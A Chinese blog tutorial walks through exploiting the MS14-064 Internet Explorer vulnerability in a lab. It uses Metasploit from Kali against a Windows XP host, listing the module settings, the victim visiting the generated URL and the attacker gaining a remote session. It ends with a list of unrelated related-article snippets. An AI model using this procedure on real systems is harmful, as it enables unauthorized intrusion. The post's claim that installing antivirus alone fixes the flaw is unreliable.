第一篇在此平台发布实战内容,有多处不足请多指教,本次内容详解ms14-064漏洞利用与加固。

任务环境说明:

渗透机:Kali Linux

靶机:Microsoft Windows XP

渗透机IP:172.16.7.122

靶机IP:172.16.7.120

实验步骤实战

1.打开网络拓扑  进入msfconsole渗透测试平台

2.输入命令 search ms14-064 搜索模块,并用use 调节 输入此下面红色模块

3.输入 show options查看配置所需的参数

4.输入 set SRVHOST命令来设置本地监听的地址   注:SRVHOST监听 kali是不区分大小写的

5.输入 set SRVORT 设置本地监听端口

6.输入 set URIPATH 来设置所利用的网站路径

7.输入 set payload +攻击模块 来设置攻击

8.输入 set LHOST 来设置攻击机IP地址

9.输入set options最后重新查看所设置的参数 都设置完毕了没有

10.最后输入攻击命令 run或exploit来进行漏洞模块攻击

 11. run成功后已生成URL,本测试生成URL为:http://172.16.7.122:8080/

下面我们转到Windows XP这里  用ie浏览器输入已生成的URL 回车即可

12.我们重新切换到攻击机这里, 已经入侵成功了 我们随便输入几个命令来看一下,输入 dir 来显示当前目录内容

13.输入 sessions -i来查看当前活跃会话

好了这是ms14-064的漏洞渗透实验,预防此漏洞 在系统中安装杀毒软件来加固自己的操作系统即可

本次实验结束,此文章经供参考,大家切勿利用做违法法律行为, 安全合理上网。

网络安全渗透实战详细详解相关推荐

  1. 【JavaWeb篇】快速上手Tomcat|实战项目详解

    作者主页:橙子! 主页 系列专栏:JavaWeb基础教程系列 精彩回顾:HTTP协议详解 文章目的:Web服务器TomCat的使用以及配置问题 文章目录 前言 1.Web服务器 2.Tomcat简介 ...

  2. 快速学习MyBatis|实战项目详解

    作者主页:橙子! 主页 系列专栏:JavaWeb基础教程系列 精彩回顾:HTTP协议详解 文章目的:快速学习MyBatis及实战项目详解 文章目录 1.什么是MyBatis? 2. JDBC存在的缺点 ...

  3. ARP缓存表的构成ARP协议全面实战协议详解、攻击与防御

    ARP缓存表的构成ARP协议全面实战协议详解.攻击与防御 1.4.3  ARP缓存表的构成 在局域网的任何一台主机中,都有一个ARP缓存表.该缓存表中保存中多个ARP条目.每个ARP条目都是由一个IP ...

  4. 微信支付 php详解,PHP实现微信支付实战案例详解

    这次给大家带来PHP实现微信支付实战案例详解,PHP实现微信支付的注意事项有哪些,下面就是实战案例,一起来看一下. 前期准备: 1.微信认证服务号,并且开通了微信支付 2.微信支付SDK,下载地址:h ...

  5. 网络安全之IP地址详解

    网络安全 day2 IP地址详解 说到IP地址,先来了解一下几个名词: 局域网:又称为内网,把分布在数公里范围内的不同物理位置的计算机设备连在一起,在网络软件的支持下可以相互通讯和资源共享的网络系统. ...

  6. WSUS MITM远程攻击实战全过程详解

    本文讲的是 WSUS MITM远程攻击实战全过程详解, 网络攻击(WPAD注入,HTTP / WSUS 中间人攻击,SMBRelay攻击等)是一个非常有用的攻击向量,攻击者可以使用此类攻击尝试以半定向 ...

  7. 【华为云计算产品系列】云上容灾架构实战部署详解

    [华为云计算产品系列]云上容灾架构实战部署详解 1.前言 2. 容灾方案介绍 2.1. 本地高可用 2.2. 同城双活 2.3. 主备容灾(同步远程复制/异步远程复制) 2.3.1. 同步远程复制 2 ...

  8. pytorch实战:详解查准率(Precision)、查全率(Recall)与F1

    pytorch实战:详解查准率(Precision).查全率(Recall)与F1 1.概述 本文首先介绍了机器学习分类问题的性能指标查准率(Precision).查全率(Recall)与F1度量,阐 ...

  9. top命令参数详解(linux top命令的用法详细详解)

    通过top命令可以有效的发现系统的缺陷出在哪里.是内存不够.CPU处理能力不够.IO读写过高. top命令输出长这样: top命令参数详解(linux top命令的用法详细详解) 以下解析一下各个字段 ...

  10. DC-1靶场搭建及渗透实战详细过程(DC靶场系列)

    目录 一. 环境搭建 1. 准备工具 渗透利器kali DC-1靶场机 2. 安装过程 二. 渗透过程 1. 信息收集 ①探测目标IP地址 ②探测目标IP开放端口 ③网页信息收集 2. 漏洞查找与利用 ...

最新文章

  1. ADAS处理器集成功能安全单片机MCU
  2. zoj - 3502 Contest
  3. docker安装elasticsearch_Docker 安装 ElasticSearch
  4. ABP框架详解(三)Domain
  5. java对象头_我的并发编程(二):java对象头以及synchronized升级过程
  6. 【UDP协议头解析】
  7. 浅谈App对我们行业门户网站的作用
  8. 英伟达收购交易取消后 ARM将裁员1000人
  9. java如何初始化对象_java中对象的初始化过程
  10. 2020最新Java高级工程师学习路线
  11. 快速学习Linux-网络管理
  12. php varbinary,php – 无法从MSSQL中获取varbinary数据
  13. APP测试常用测试点
  14. C#多线程之解决多线程编程中大并发数等待唤醒的问题
  15. 学习ebpf_exporter项目搞懂prometheus client端的全调度
  16. 我的中国心-百家姓头像
  17. 《响应式Web图形设计》一1.4 布置页面内容
  18. Kali下载Python软件包管理工具
  19. java的int转long
  20. 「浏览器书签」与「笔记类工具」在信息管理中的定位

热门文章

  1. phpwind升级php7,phpwind v8.7 升级教程图文说明
  2. dell无线网卡驱动安装
  3. 长江大学计算机网络期末考试试题及答案,长江大学计算机基础考试试题
  4. 计算机无法连接蓝牙键盘,终于理会电脑无法识别蓝牙鼠标键盘
  5. Smarty中文手册
  6. vb.net怎么和mysql连接_解析VB.NET如何连接数据库
  7. 编译原理-第一章:引论
  8. 【元胞自动机】基于元胞自动机模拟单车道交通流含Matlab源码
  9. win下编译TNN安卓库(静态或者动态) + android studio ndk调用
  10. 逛街游戏html5,HTML5购物商城app源码